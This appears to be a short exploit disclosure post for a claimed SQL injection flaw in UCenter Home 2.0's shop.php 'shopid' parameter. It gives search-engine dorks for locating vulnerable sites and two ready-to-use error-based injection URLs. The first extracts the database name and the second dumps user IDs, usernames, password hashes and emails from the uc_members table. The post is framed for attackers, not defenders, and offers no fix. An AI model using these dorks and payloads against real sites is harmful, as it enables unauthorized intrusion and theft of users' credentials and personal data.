__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout

*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com

*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0

Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view

Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php

Values : (?)ac=view&shopid=

Vulnerability Type : SQL Injection (MySQL Error Based)

Needed Materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

Edit the DB name: `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okay.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1